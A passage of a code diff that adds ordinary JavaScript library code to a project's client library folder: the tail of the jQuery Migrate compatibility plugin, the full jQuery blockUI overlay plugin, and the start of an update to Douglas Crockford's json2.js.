+		migrateWarn("jQuery.clean() is deprecated");
+
+		var i, elem, handleScript, jsTags,
+			ret = [];
+
+		jQuery.merge( ret, jQuery.buildFragment( elems, context ).childNodes );
+
+		// Complex logic lifted directly from jQuery 1.8
+		if ( fragment ) {
+			// Special handling of each script element
+			handleScript = function( elem ) {
+				// Check if we consider it executable
+				if ( !elem.type || rscriptType.test( elem.type ) ) {
+					// Detach the script and store it in the scripts array (if provided) or the fragment
+					// Return truthy to indicate that it has been handled
+					return scripts ?
+						scripts.push( elem.parentNode ? elem.parentNode.removeChild( elem ) : elem ) :
+						fragment.appendChild( elem );
+				}
+			};
+
+			for ( i = 0; (elem = ret[i]) != null; i++ ) {
+				// Check if we're done after handling an executable script
+				if ( !( jQuery.nodeName( elem, "script" ) && handleScript( elem ) ) ) {
+					// Append to fragment and handle embedded scripts
+					fragment.appendChild( elem );
+					if ( typeof elem.getElementsByTagName !== "undefined" ) {
+						// handleScript alters the DOM, so use jQuery.merge to ensure snapshot iteration
+						jsTags = jQuery.grep( jQuery.merge( [], elem.getElementsByTagName("script") ), handleScript );
+
+						// Splice the scripts into ret after their former ancestor and advance our index beyond them
+						ret.splice.apply( ret, [i + 1, 0].concat( jsTags ) );
+						i += jsTags.length;
+					}
+				}
+			}
+		}
+
+		return ret;
+	};
+}
+
+var eventAdd = jQuery.event.add,
+	eventRemove = jQuery.event.remove,
+	eventTrigger = jQuery.event.trigger,
+	oldToggle = jQuery.fn.toggle,
+	oldLive = jQuery.fn.live,
+	oldDie = jQuery.fn.die,
+	oldLoad = jQuery.fn.load,
+	ajaxEvents = "ajaxStart|ajaxStop|ajaxSend|ajaxComplete|ajaxError|ajaxSuccess",
+	rajaxEvent = new RegExp( "\\b(?:" + ajaxEvents + ")\\b" ),
+	rhoverHack = /(?:^|\s)hover(\.\S+|)\b/,
+	hoverHack = function( events ) {
+		if ( typeof( events ) !== "string" || jQuery.event.special.hover ) {
+			return events;
+		}
+		if ( rhoverHack.test( events ) ) {
+			migrateWarn("'hover' pseudo-event is deprecated, use 'mouseenter mouseleave'");
+		}
+		return events && events.replace( rhoverHack, "mouseenter$1 mouseleave$1" );
+	};
+
+// Event props removed in 1.9, put them back if needed; no practical way to warn them
+if ( jQuery.event.props && jQuery.event.props[ 0 ] !== "attrChange" ) {
+	jQuery.event.props.unshift( "attrChange", "attrName", "relatedNode", "srcElement" );
+}
+
+// Undocumented jQuery.event.handle was "deprecated" in jQuery 1.7
+if ( jQuery.event.dispatch ) {
+	migrateWarnProp( jQuery.event, "handle", jQuery.event.dispatch, "jQuery.event.handle is undocumented and deprecated" );
+}
+
+// Support for 'hover' pseudo-event and ajax event warnings
+jQuery.event.add = function( elem, types, handler, data, selector ){
+	if ( elem !== document && rajaxEvent.test( types ) ) {
+		migrateWarn( "AJAX events should be attached to document: " + types );
+	}
+	eventAdd.call( this, elem, hoverHack( types || "" ), handler, data, selector );
+};
+jQuery.event.remove = function( elem, types, handler, selector, mappedTypes ){
+	eventRemove.call( this, elem, hoverHack( types ) || "", handler, selector, mappedTypes );
+};
+
+jQuery.each( [ "load", "unload", "error" ], function( _, name ) {
+
+	jQuery.fn[ name ] = function() {
+		var args = Array.prototype.slice.call( arguments, 0 );
+
+		// If this is an ajax load() the first arg should be the string URL;
+		// technically this could also be the "Anything" arg of the event .load()
+		// which just goes to show why this dumb signature has been deprecated!
+		// jQuery custom builds that exclude the Ajax module justifiably die here.
+		if ( name === "load" && typeof args[ 0 ] === "string" ) {
+			return oldLoad.apply( this, args );
+		}
+
+		migrateWarn( "jQuery.fn." + name + "() is deprecated" );
+
+		args.splice( 0, 0, name );
+		if ( arguments.length ) {
+			return this.bind.apply( this, args );
+		}
+
+		// Use .triggerHandler here because:
+		// - load and unload events don't need to bubble, only applied to window or image
+		// - error event should not bubble to window, although it does pre-1.7
+		// See http://bugs.jquery.com/ticket/11820
+		this.triggerHandler.apply( this, args );
+		return this;
+	};
+
+});
+
+jQuery.fn.toggle = function( fn, fn2 ) {
+
+	// Don't mess with animation or css toggles
+	if ( !jQuery.isFunction( fn ) || !jQuery.isFunction( fn2 ) ) {
+		return oldToggle.apply( this, arguments );
+	}
+	migrateWarn("jQuery.fn.toggle(handler, handler...) is deprecated");
+
+	// Save reference to arguments for access in closure
+	var args = arguments,
+		guid = fn.guid || jQuery.guid++,
+		i = 0,
+		toggler = function( event ) {
+			// Figure out which function to execute
+			var lastToggle = ( jQuery._data( this, "lastToggle" + fn.guid ) || 0 ) % i;
+			jQuery._data( this, "lastToggle" + fn.guid, lastToggle + 1 );
+
+			// Make sure that clicks stop
+			event.preventDefault();
+
+			// and execute the function
+			return args[ lastToggle ].apply( this, arguments ) || false;
+		};
+
+	// link all the functions, so any of them can unbind this click handler
+	toggler.guid = guid;
+	while ( i < args.length ) {
+		args[ i++ ].guid = guid;
+	}
+
+	return this.click( toggler );
+};
+
+jQuery.fn.live = function( types, data, fn ) {
+	migrateWarn("jQuery.fn.live() is deprecated");
+	if ( oldLive ) {
+		return oldLive.apply( this, arguments );
+	}
+	jQuery( this.context ).on( types, this.selector, data, fn );
+	return this;
+};
+
+jQuery.fn.die = function( types, fn ) {
+	migrateWarn("jQuery.fn.die() is deprecated");
+	if ( oldDie ) {
+		return oldDie.apply( this, arguments );
+	}
+	jQuery( this.context ).off( types, this.selector || "**", fn );
+	return this;
+};
+
+// Turn global events into document-triggered events
+jQuery.event.trigger = function( event, data, elem, onlyHandlers  ){
+	if ( !elem && !rajaxEvent.test( event ) ) {
+		migrateWarn( "Global events are undocumented and deprecated" );
+	}
+	return eventTrigger.call( this,  event, data, elem || document, onlyHandlers  );
+};
+jQuery.each( ajaxEvents.split("|"),
+	function( _, name ) {
+		jQuery.event.special[ name ] = {
+			setup: function() {
+				var elem = this;
+
+				// The document needs no shimming; must be !== for oldIE
+				if ( elem !== document ) {
+					jQuery.event.add( document, name + "." + jQuery.guid, function() {
+						jQuery.event.trigger( name, Array.prototype.slice.call( arguments, 1 ), elem, true );
+					});
+					jQuery._data( this, name, jQuery.guid++ );
+				}
+				return false;
+			},
+			teardown: function() {
+				if ( this !== document ) {
+					jQuery.event.remove( document, name + "." + jQuery._data( this, name ) );
+				}
+				return false;
+			}
+		};
+	}
+);
+
+jQuery.event.special.ready = {
+	setup: function() {
+		if ( this === document ) {
+			migrateWarn( "'ready' event is deprecated" );
+		}
+	}
+};
+
+var oldSelf = jQuery.fn.andSelf || jQuery.fn.addBack,
+	oldFnFind = jQuery.fn.find;
+
+jQuery.fn.andSelf = function() {
+	migrateWarn("jQuery.fn.andSelf() replaced by jQuery.fn.addBack()");
+	return oldSelf.apply( this, arguments );
+};
+
+jQuery.fn.find = function( selector ) {
+	var ret = oldFnFind.apply( this, arguments );
+	ret.context = this.context;
+	ret.selector = this.selector ? this.selector + " " + selector : selector;
+	return ret;
+};
+
+
+// jQuery 1.6 did not support Callbacks, do not warn there
+if ( jQuery.Callbacks ) {
+
+	var oldDeferred = jQuery.Deferred,
+		tuples = [
+			// action, add listener, callbacks, .then handlers, final state
+			[ "resolve", "done", jQuery.Callbacks("once memory"),
+				jQuery.Callbacks("once memory"), "resolved" ],
+			[ "reject", "fail", jQuery.Callbacks("once memory"),
+				jQuery.Callbacks("once memory"), "rejected" ],
+			[ "notify", "progress", jQuery.Callbacks("memory"),
+				jQuery.Callbacks("memory") ]
+		];
+
+	jQuery.Deferred = function( func ) {
+		var deferred = oldDeferred(),
+			promise = deferred.promise();
+
+		deferred.pipe = promise.pipe = function( /* fnDone, fnFail, fnProgress */ ) {
+			var fns = arguments;
+
+			migrateWarn( "deferred.pipe() is deprecated" );
+
+			return jQuery.Deferred(function( newDefer ) {
+				jQuery.each( tuples, function( i, tuple ) {
+					var fn = jQuery.isFunction( fns[ i ] ) && fns[ i ];
+					// deferred.done(function() { bind to newDefer or newDefer.resolve })
+					// deferred.fail(function() { bind to newDefer or newDefer.reject })
+					// deferred.progress(function() { bind to newDefer or newDefer.notify })
+					deferred[ tuple[1] ](function() {
+						var returned = fn && fn.apply( this, arguments );
+						if ( returned && jQuery.isFunction( returned.promise ) ) {
+							returned.promise()
+								.done( newDefer.resolve )
+								.fail( newDefer.reject )
+								.progress( newDefer.notify );
+						} else {
+							newDefer[ tuple[ 0 ] + "With" ](
+								this === promise ? newDefer.promise() : this,
+								fn ? [ returned ] : arguments
+							);
+						}
+					});
+				});
+				fns = null;
+			}).promise();
+
+		};
+
+		deferred.isResolved = function() {
+			migrateWarn( "deferred.isResolved is deprecated" );
+			return deferred.state() === "resolved";
+		};
+
+		deferred.isRejected = function() {
+			migrateWarn( "deferred.isRejected is deprecated" );
+			return deferred.state() === "rejected";
+		};
+
+		if ( func ) {
+			func.call( deferred, deferred );
+		}
+
+		return deferred;
+	};
+
+}
+
+})( jQuery, window );

core/main/client/lib/jquery.blockUI.js

@@ -0,0 +1,620 @@
+/*!
+ * jQuery blockUI plugin
+ * Version 2.70.0-2014.11.23
+ * Requires jQuery v1.7 or later
+ *
+ * Examples at: http://malsup.com/jquery/block/
+ * Copyright (c) 2007-2013 M. Alsup
+ * Dual licensed under the MIT and GPL licenses:
+ * http://www.opensource.org/licenses/mit-license.php
+ * http://www.gnu.org/licenses/gpl.html
+ *
+ * Thanks to Amir-Hossein Sobhi for some excellent contributions!
+ */
+
+;(function() {
+/*jshint eqeqeq:false curly:false latedef:false */
+"use strict";
+
+	function setup($) {
+		$.fn._fadeIn = $.fn.fadeIn;
+
+		var noOp = $.noop || function() {};
+
+		// this bit is to ensure we don't call setExpression when we shouldn't (with extra muscle to handle
+		// confusing userAgent strings on Vista)
+		var msie = /MSIE/.test(navigator.userAgent);
+		var ie6  = /MSIE 6.0/.test(navigator.userAgent) && ! /MSIE 8.0/.test(navigator.userAgent);
+		var mode = document.documentMode || 0;
+		var setExpr = $.isFunction( document.createElement('div').style.setExpression );
+
+		// global $ methods for blocking/unblocking the entire page
+		$.blockUI   = function(opts) { install(window, opts); };
+		$.unblockUI = function(opts) { remove(window, opts); };
+
+		// convenience method for quick growl-like notifications  (http://www.google.com/search?q=growl)
+		$.growlUI = function(title, message, timeout, onClose) {
+			var $m = $('<div class="growlUI"></div>');
+			if (title) $m.append('<h1>'+title+'</h1>');
+			if (message) $m.append('<h2>'+message+'</h2>');
+			if (timeout === undefined) timeout = 3000;
+
+			// Added by konapun: Set timeout to 30 seconds if this growl is moused over, like normal toast notifications
+			var callBlock = function(opts) {
+				opts = opts || {};
+
+				$.blockUI({
+					message: $m,
+					fadeIn : typeof opts.fadeIn  !== 'undefined' ? opts.fadeIn  : 700,
+					fadeOut: typeof opts.fadeOut !== 'undefined' ? opts.fadeOut : 1000,
+					timeout: typeof opts.timeout !== 'undefined' ? opts.timeout : timeout,
+					centerY: false,
+					showOverlay: false,
+					onUnblock: onClose,
+					css: $.blockUI.defaults.growlCSS
+				});
+			};
+
+			callBlock();
+			var nonmousedOpacity = $m.css('opacity');
+			$m.mouseover(function() {
+				callBlock({
+					fadeIn: 0,
+					timeout: 30000
+				});
+
+				var displayBlock = $('.blockMsg');
+				displayBlock.stop(); // cancel fadeout if it has started
+				displayBlock.fadeTo(300, 1); // make it easier to read the message by removing transparency
+			}).mouseout(function() {
+				$('.blockMsg').fadeOut(1000);
+			});
+			// End konapun additions
+		};
+
+		// plugin method for blocking element content
+		$.fn.block = function(opts) {
+			if ( this[0] === window ) {
+				$.blockUI( opts );
+				return this;
+			}
+			var fullOpts = $.extend({}, $.blockUI.defaults, opts || {});
+			this.each(function() {
+				var $el = $(this);
+				if (fullOpts.ignoreIfBlocked && $el.data('blockUI.isBlocked'))
+					return;
+				$el.unblock({ fadeOut: 0 });
+			});
+
+			return this.each(function() {
+				if ($.css(this,'position') == 'static') {
+					this.style.position = 'relative';
+					$(this).data('blockUI.static', true);
+				}
+				this.style.zoom = 1; // force 'hasLayout' in ie
+				install(this, opts);
+			});
+		};
+
+		// plugin method for unblocking element content
+		$.fn.unblock = function(opts) {
+			if ( this[0] === window ) {
+				$.unblockUI( opts );
+				return this;
+			}
+			return this.each(function() {
+				remove(this, opts);
+			});
+		};
+
+		$.blockUI.version = 2.70; // 2nd generation blocking at no extra cost!
+
+		// override these in your code to change the default behavior and style
+		$.blockUI.defaults = {
+			// message displayed when blocking (use null for no message)
+			message:  '<h1>Please wait...</h1>',
+
+			title: null,		// title string; only used when theme == true
+			draggable: true,	// only used when theme == true (requires jquery-ui.js to be loaded)
+
+			theme: false, // set to true to use with jQuery UI themes
+
+			// styles for the message when blocking; if you wish to disable
+			// these and use an external stylesheet then do this in your code:
+			// $.blockUI.defaults.css = {};
+			css: {
+				padding:	0,
+				margin:		0,
+				width:		'30%',
+				top:		'40%',
+				left:		'35%',
+				textAlign:	'center',
+				color:		'#000',
+				border:		'3px solid #aaa',
+				backgroundColor:'#fff',
+				cursor:		'wait'
+			},
+
+			// minimal style set used when themes are used
+			themedCSS: {
+				width:	'30%',
+				top:	'40%',
+				left:	'35%'
+			},
+
+			// styles for the overlay
+			overlayCSS:  {
+				backgroundColor:	'#000',
+				opacity:			0.6,
+				cursor:				'wait'
+			},
+
+			// style to replace wait cursor before unblocking to correct issue
+			// of lingering wait cursor
+			cursorReset: 'default',
+
+			// styles applied when using $.growlUI
+			growlCSS: {
+				width:		'350px',
+				top:		'10px',
+				left:		'',
+				right:		'10px',
+				border:		'none',
+				padding:	'5px',
+				opacity:	0.6,
+				cursor:		'default',
+				color:		'#fff',
+				backgroundColor: '#000',
+				'-webkit-border-radius':'10px',
+				'-moz-border-radius':	'10px',
+				'border-radius':		'10px'
+			},
+
+			// IE issues: 'about:blank' fails on HTTPS and javascript:false is s-l-o-w
+			// (hat tip to Jorge H. N. de Vasconcelos)
+			/*jshint scripturl:true */
+			iframeSrc: /^https/i.test(window.location.href || '') ? 'javascript:false' : 'about:blank',
+
+			// force usage of iframe in non-IE browsers (handy for blocking applets)
+			forceIframe: false,
+
+			// z-index for the blocking overlay
+			baseZ: 1000,
+
+			// set these to true to have the message automatically centered
+			centerX: true, // <-- only effects element blocking (page block controlled via css above)
+			centerY: true,
+
+			// allow body element to be stetched in ie6; this makes blocking look better
+			// on "short" pages.  disable if you wish to prevent changes to the body height
+			allowBodyStretch: true,
+
+			// enable if you want key and mouse events to be disabled for content that is blocked
+			bindEvents: true,
+
+			// be default blockUI will supress tab navigation from leaving blocking content
+			// (if bindEvents is true)
+			constrainTabKey: true,
+
+			// fadeIn time in millis; set to 0 to disable fadeIn on block
+			fadeIn:  200,
+
+			// fadeOut time in millis; set to 0 to disable fadeOut on unblock
+			fadeOut:  400,
+
+			// time in millis to wait before auto-unblocking; set to 0 to disable auto-unblock
+			timeout: 0,
+
+			// disable if you don't want to show the overlay
+			showOverlay: true,
+
+			// if true, focus will be placed in the first available input field when
+			// page blocking
+			focusInput: true,
+
+            // elements that can receive focus
+            focusableElements: ':input:enabled:visible',
+
+			// suppresses the use of overlay styles on FF/Linux (due to performance issues with opacity)
+			// no longer needed in 2012
+			// applyPlatformOpacityRules: true,
+
+			// callback method invoked when fadeIn has completed and blocking message is visible
+			onBlock: null,
+
+			// callback method invoked when unblocking has completed; the callback is
+			// passed the element that has been unblocked (which is the window object for page
+			// blocks) and the options that were passed to the unblock call:
+			//	onUnblock(element, options)
+			onUnblock: null,
+
+			// callback method invoked when the overlay area is clicked.
+			// setting this will turn the cursor to a pointer, otherwise cursor defined in overlayCss will be used.
+			onOverlayClick: null,
+
+			// don't ask; if you really must know: http://groups.google.com/group/jquery-en/browse_thread/thread/36640a8730503595/2f6a79a77a78e493#2f6a79a77a78e493
+			quirksmodeOffsetHack: 4,
+
+			// class name of the message block
+			blockMsgClass: 'blockMsg',
+
+			// if it is already blocked, then ignore it (don't unblock and reblock)
+			ignoreIfBlocked: false
+		};
+
+		// private data and functions follow...
+
+		var pageBlock = null;
+		var pageBlockEls = [];
+
+		function install(el, opts) {
+			var css, themedCSS;
+			var full = (el == window);
+			var msg = (opts && opts.message !== undefined ? opts.message : undefined);
+			opts = $.extend({}, $.blockUI.defaults, opts || {});
+
+			if (opts.ignoreIfBlocked && $(el).data('blockUI.isBlocked'))
+				return;
+
+			opts.overlayCSS = $.extend({}, $.blockUI.defaults.overlayCSS, opts.overlayCSS || {});
+			css = $.extend({}, $.blockUI.defaults.css, opts.css || {});
+			if (opts.onOverlayClick)
+				opts.overlayCSS.cursor = 'pointer';
+
+			themedCSS = $.extend({}, $.blockUI.defaults.themedCSS, opts.themedCSS || {});
+			msg = msg === undefined ? opts.message : msg;
+
+			// remove the current block (if there is one)
+			if (full && pageBlock)
+				remove(window, {fadeOut:0});
+
+			// if an existing element is being used as the blocking content then we capture
+			// its current place in the DOM (and current display style) so we can restore
+			// it when we unblock
+			if (msg && typeof msg != 'string' && (msg.parentNode || msg.jquery)) {
+				var node = msg.jquery ? msg[0] : msg;
+				var data = {};
+				$(el).data('blockUI.history', data);
+				data.el = node;
+				data.parent = node.parentNode;
+				data.display = node.style.display;
+				data.position = node.style.position;
+				if (data.parent)
+					data.parent.removeChild(node);
+			}
+
+			$(el).data('blockUI.onUnblock', opts.onUnblock);
+			var z = opts.baseZ;
+
+			// blockUI uses 3 layers for blocking, for simplicity they are all used on every platform;
+			// layer1 is the iframe layer which is used to supress bleed through of underlying content
+			// layer2 is the overlay layer which has opacity and a wait cursor (by default)
+			// layer3 is the message content that is displayed while blocking
+			var lyr1, lyr2, lyr3, s;
+			if (msie || opts.forceIframe)
+				lyr1 = $('<iframe class="blockUI" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0" src="'+opts.iframeSrc+'"></iframe>');
+			else
+				lyr1 = $('<div class="blockUI" style="display:none"></div>');
+
+			if (opts.theme)
+				lyr2 = $('<div class="blockUI blockOverlay ui-widget-overlay" style="z-index:'+ (z++) +';display:none"></div>');
+			else
+				lyr2 = $('<div class="blockUI blockOverlay" style="z-index:'+ (z++) +';display:none;border:none;margin:0;padding:0;width:100%;height:100%;top:0;left:0"></div>');
+
+			if (opts.theme && full) {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:fixed">';
+				if ( opts.title ) {
+					s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
+				}
+				s += '<div class="ui-widget-content ui-dialog-content"></div>';
+				s += '</div>';
+			}
+			else if (opts.theme) {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement ui-dialog ui-widget ui-corner-all" style="z-index:'+(z+10)+';display:none;position:absolute">';
+				if ( opts.title ) {
+					s += '<div class="ui-widget-header ui-dialog-titlebar ui-corner-all blockTitle">'+(opts.title || '&nbsp;')+'</div>';
+				}
+				s += '<div class="ui-widget-content ui-dialog-content"></div>';
+				s += '</div>';
+			}
+			else if (full) {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockPage" style="z-index:'+(z+10)+';display:none;position:fixed"></div>';
+			}
+			else {
+				s = '<div class="blockUI ' + opts.blockMsgClass + ' blockElement" style="z-index:'+(z+10)+';display:none;position:absolute"></div>';
+			}
+			lyr3 = $(s);
+
+			// if we have a message, style it
+			if (msg) {
+				if (opts.theme) {
+					lyr3.css(themedCSS);
+					lyr3.addClass('ui-widget-content');
+				}
+				else
+					lyr3.css(css);
+			}
+
+			// style the overlay
+			if (!opts.theme /*&& (!opts.applyPlatformOpacityRules)*/)
+				lyr2.css(opts.overlayCSS);
+			lyr2.css('position', full ? 'fixed' : 'absolute');
+
+			// make iframe layer transparent in IE
+			if (msie || opts.forceIframe)
+				lyr1.css('opacity',0.0);
+
+			//$([lyr1[0],lyr2[0],lyr3[0]]).appendTo(full ? 'body' : el);
+			var layers = [lyr1,lyr2,lyr3], $par = full ? $('body') : $(el);
+			$.each(layers, function() {
+				this.appendTo($par);
+			});
+
+			if (opts.theme && opts.draggable && $.fn.draggable) {
+				lyr3.draggable({
+					handle: '.ui-dialog-titlebar',
+					cancel: 'li'
+				});
+			}
+
+			// ie7 must use absolute positioning in quirks mode and to account for activex issues (when scrolling)
+			var expr = setExpr && (!$.support.boxModel || $('object,embed', full ? null : el).length > 0);
+			if (ie6 || expr) {
+				// give body 100% height
+				if (full && opts.allowBodyStretch && $.support.boxModel)
+					$('html,body').css('height','100%');
+
+				// fix ie6 issue when blocked element has a border width
+				if ((ie6 || !$.support.boxModel) && !full) {
+					var t = sz(el,'borderTopWidth'), l = sz(el,'borderLeftWidth');
+					var fixT = t ? '(0 - '+t+')' : 0;
+					var fixL = l ? '(0 - '+l+')' : 0;
+				}
+
+				// simulate fixed position
+				$.each(layers, function(i,o) {
+					var s = o[0].style;
+					s.position = 'absolute';
+					if (i < 2) {
+						if (full)
+							s.setExpression('height','Math.max(document.body.scrollHeight, document.body.offsetHeight) - (jQuery.support.boxModel?0:'+opts.quirksmodeOffsetHack+') + "px"');
+						else
+							s.setExpression('height','this.parentNode.offsetHeight + "px"');
+						if (full)
+							s.setExpression('width','jQuery.support.boxModel && document.documentElement.clientWidth || document.body.clientWidth + "px"');
+						else
+							s.setExpression('width','this.parentNode.offsetWidth + "px"');
+						if (fixL) s.setExpression('left', fixL);
+						if (fixT) s.setExpression('top', fixT);
+					}
+					else if (opts.centerY) {
+						if (full) s.setExpression('top','(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (blah = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"');
+						s.marginTop = 0;
+					}
+					else if (!opts.centerY && full) {
+						var top = (opts.css && opts.css.top) ? parseInt(opts.css.top, 10) : 0;
+						var expression = '((document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + '+top+') + "px"';
+						s.setExpression('top',expression);
+					}
+				});
+			}
+
+			// show the message
+			if (msg) {
+				if (opts.theme)
+					lyr3.find('.ui-widget-content').append(msg);
+				else
+					lyr3.append(msg);
+				if (msg.jquery || msg.nodeType)
+					$(msg).show();
+			}
+
+			if ((msie || opts.forceIframe) && opts.showOverlay)
+				lyr1.show(); // opacity is zero
+			if (opts.fadeIn) {
+				var cb = opts.onBlock ? opts.onBlock : noOp;
+				var cb1 = (opts.showOverlay && !msg) ? cb : noOp;
+				var cb2 = msg ? cb : noOp;
+				if (opts.showOverlay)
+					lyr2._fadeIn(opts.fadeIn, cb1);
+				if (msg)
+					lyr3._fadeIn(opts.fadeIn, cb2);
+			}
+			else {
+				if (opts.showOverlay)
+					lyr2.show();
+				if (msg)
+					lyr3.show();
+				if (opts.onBlock)
+					opts.onBlock.bind(lyr3)();
+			}
+
+			// bind key and mouse events
+			bind(1, el, opts);
+
+			if (full) {
+				pageBlock = lyr3[0];
+				pageBlockEls = $(opts.focusableElements,pageBlock);
+				if (opts.focusInput)
+					setTimeout(focus, 20);
+			}
+			else
+				center(lyr3[0], opts.centerX, opts.centerY);
+
+			if (opts.timeout) {
+				// auto-unblock
+				var to = setTimeout(function() {
+					if (full)
+						$.unblockUI(opts);
+					else
+						$(el).unblock(opts);
+				}, opts.timeout);
+				$(el).data('blockUI.timeout', to);
+			}
+		}
+
+		// remove the block
+		function remove(el, opts) {
+			var count;
+			var full = (el == window);
+			var $el = $(el);
+			var data = $el.data('blockUI.history');
+			var to = $el.data('blockUI.timeout');
+			if (to) {
+				clearTimeout(to);
+				$el.removeData('blockUI.timeout');
+			}
+			opts = $.extend({}, $.blockUI.defaults, opts || {});
+			bind(0, el, opts); // unbind events
+
+			if (opts.onUnblock === null) {
+				opts.onUnblock = $el.data('blockUI.onUnblock');
+				$el.removeData('blockUI.onUnblock');
+			}
+
+			var els;
+			if (full) // crazy selector to handle odd field errors in ie6/7
+				els = $('body').children().filter('.blockUI').add('body > .blockUI');
+			else
+				els = $el.find('>.blockUI');
+
+			// fix cursor issue
+			if ( opts.cursorReset ) {
+				if ( els.length > 1 )
+					els[1].style.cursor = opts.cursorReset;
+				if ( els.length > 2 )
+					els[2].style.cursor = opts.cursorReset;
+			}
+
+			if (full)
+				pageBlock = pageBlockEls = null;
+
+			if (opts.fadeOut) {
+				count = els.length;
+				els.stop().fadeOut(opts.fadeOut, function() {
+					if ( --count === 0)
+						reset(els,data,opts,el);
+				});
+			}
+			else
+				reset(els, data, opts, el);
+		}
+
+		// move blocking element back into the DOM where it started
+		function reset(els,data,opts,el) {
+			var $el = $(el);
+			if ( $el.data('blockUI.isBlocked') )
+				return;
+
+			els.each(function(i,o) {
+				// remove via DOM calls so we don't lose event handlers
+				if (this.parentNode)
+					this.parentNode.removeChild(this);
+			});
+
+			if (data && data.el) {
+				data.el.style.display = data.display;
+				data.el.style.position = data.position;
+				data.el.style.cursor = 'default'; // #59
+				if (data.parent)
+					data.parent.appendChild(data.el);
+				$el.removeData('blockUI.history');
+			}
+
+			if ($el.data('blockUI.static')) {
+				$el.css('position', 'static'); // #22
+			}
+
+			if (typeof opts.onUnblock == 'function')
+				opts.onUnblock(el,opts);
+
+			// fix issue in Safari 6 where block artifacts remain until reflow
+			var body = $(document.body), w = body.width(), cssW = body[0].style.width;
+			body.width(w-1).width(w);
+			body[0].style.width = cssW;
+		}
+
+		// bind/unbind the handler
+		function bind(b, el, opts) {
+			var full = el == window, $el = $(el);
+
+			// don't bother unbinding if there is nothing to unbind
+			if (!b && (full && !pageBlock || !full && !$el.data('blockUI.isBlocked')))
+				return;
+
+			$el.data('blockUI.isBlocked', b);
+
+			// don't bind events when overlay is not in use or if bindEvents is false
+			if (!full || !opts.bindEvents || (b && !opts.showOverlay))
+				return;
+
+			// bind anchors and inputs for mouse and key events
+			var events = 'mousedown mouseup keydown keypress keyup touchstart touchend touchmove';
+			if (b)
+				$(document).bind(events, opts, handler);
+			else
+				$(document).unbind(events, handler);
+
+		// former impl...
+		//		var $e = $('a,:input');
+		//		b ? $e.bind(events, opts, handler) : $e.unbind(events, handler);
+		}
+
+		// event handler to suppress keyboard/mouse events when blocking
+		function handler(e) {
+			// allow tab navigation (conditionally)
+			if (e.type === 'keydown' && e.keyCode && e.keyCode == 9) {
+				if (pageBlock && e.data.constrainTabKey) {
+					var els = pageBlockEls;
+					var fwd = !e.shiftKey && e.target === els[els.length-1];
+					var back = e.shiftKey && e.target === els[0];
+					if (fwd || back) {
+						setTimeout(function(){focus(back);},10);
+						return false;
+					}
+				}
+			}
+			var opts = e.data;
+			var target = $(e.target);
+			if (target.hasClass('blockOverlay') && opts.onOverlayClick)
+				opts.onOverlayClick(e);
+
+			// allow events within the message content
+			if (target.parents('div.' + opts.blockMsgClass).length > 0)
+				return true;
+
+			// allow events for content that is not being blocked
+			return target.parents().children().filter('div.blockUI').length === 0;
+		}
+
+		function focus(back) {
+			if (!pageBlockEls)
+				return;
+			var e = pageBlockEls[back===true ? pageBlockEls.length-1 : 0];
+			if (e)
+				e.focus();
+		}
+
+		function center(el, x, y) {
+			var p = el.parentNode, s = el.style;
+			var l = ((p.offsetWidth - el.offsetWidth)/2) - sz(p,'borderLeftWidth');
+			var t = ((p.offsetHeight - el.offsetHeight)/2) - sz(p,'borderTopWidth');
+			if (x) s.left = l > 0 ? (l+'px') : '0';
+			if (y) s.top  = t > 0 ? (t+'px') : '0';
+		}
+
+		function sz(el, p) {
+			return parseInt($.css(el,p),10)||0;
+		}
+
+	}
+
+
+	/*global define:true */
+	if (typeof define === 'function' && define.amd && define.amd.jQuery) {
+		define(['jquery'], setup);
+	} else {
+		setup(jQuery);
+	}
+
+})();

core/main/client/lib/json2.js

@@ -1,58 +1,70 @@
-/*
-    https://github.com/douglascrockford/JSON-js/blob/master/json2.js
-    2011-02-23
+//  json2.js
+//  2016-10-28
+//  Public Domain.
+//  NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK.
+//  See http://www.JSON.org/js.html
+//  This code should be minified before deployment.
+//  See http://javascript.crockford.com/jsmin.html
+
+//  USE YOUR OWN COPY. IT IS EXTREMELY UNWISE TO LOAD CODE FROM SERVERS YOU DO
+//  NOT CONTROL.
+
+//  This file creates a global JSON object containing two methods: stringify
+//  and parse. This file provides the ES5 JSON capability to ES3 systems.
+//  If a project might run on IE8 or earlier, then this file should be included.
+//  This file does nothing on ES5 systems.
 
 // Create a JSON object only if one does not already exist. We create the
 // methods in a closure to avoid creating global variables.
-*/
 
-var JSON;
-if (!JSON) {
+if (typeof JSON !== "object") {
     JSON = {};
 }
 
 (function () {
     "use strict";
 
+    var rx_one = /^[\],:{}\s]*$/;
+    var rx_two = /\\(?:["\\\/bfnrt]|u[0-9a-fA-F]{4})/g;
+    var rx_three = /"[^"\\\n\r]*"|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g;
+    var rx_four = /(?:^|:|,)(?:\s*\[)+/g;
+    var rx_escapable = /[\\"\u0000-\u001f\u007f-\u009f\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;
+    var rx_dangerous = /[\u0000\u00ad\u0600-\u0604\u070f\u17b4\u17b5\u200c-\u200f\u2028-\u202f\u2060-\u206f\ufeff\ufff0-\uffff]/g;
+
     function f(n) {
         // Format integers to have at least two digits.
-        return n < 10 ? '0' + n : n;
+        return n < 10
+            ? "0" + n
+            : n;
     }
 
-    if (typeof Date.prototype.toJSON !== 'function') {
+    function this_value() {
+        return this.valueOf();
+    }
 
-        Date.prototype.toJSON = function (key) {
+    if (typeof Date.prototype.toJSON !== "function") {
 
-            return isFinite(this.valueOf()) ?
-                this.getUTCFullYear()     + '-' +
-                f(this.getUTCMonth() + 1) + '-' +
-                f(this.getUTCDate())      + 'T' +
